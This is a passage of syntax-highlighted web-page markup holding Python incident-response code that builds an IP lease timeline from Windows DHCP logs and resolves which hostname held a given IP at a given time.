plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Assign'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># New lease assigned  record start</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Previous lease ended without explicit release</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                prev_start</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">prev_start</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Release'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Lease ended</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">pop</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Close any still-active leases</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">items</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># None = still active</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> ip_timeline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">resolve_ip_at_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ip_address</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Given an IP address and a timestamp, return what hostname held that IP.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    The critical function for correlating network events to hostnames.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip_address </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> end_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip_address</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> start_ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> query_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> end_ts </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">is</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> query_time </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> end_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lease_start'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lease_end'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> end_ts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Example usage during IR:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> __name__ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'__main__'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DHCP_LOG_DIR </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'C:\\Windows\\System32\\dhcp'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[*] Parsing DHCP logs...\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parse_dhcp_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">DHCP_LOG_DIR</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Parsed </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">events</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> DHCP events\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> build_ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Built timeline for </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">ip_timeline</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> unique IP addresses\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Example: resolve IP seen in NetFlow at a specific time</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    investigation_ip </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10.10.5.42'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    investigation_time </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2025</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">11</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">15</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">47</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">33</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># From DNS/NetFlow log</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    result </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> resolve_ip_at_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> investigation_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> investigation_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[+] At </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_time</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">, </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_ip</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> was held by:\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"    Hostname: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 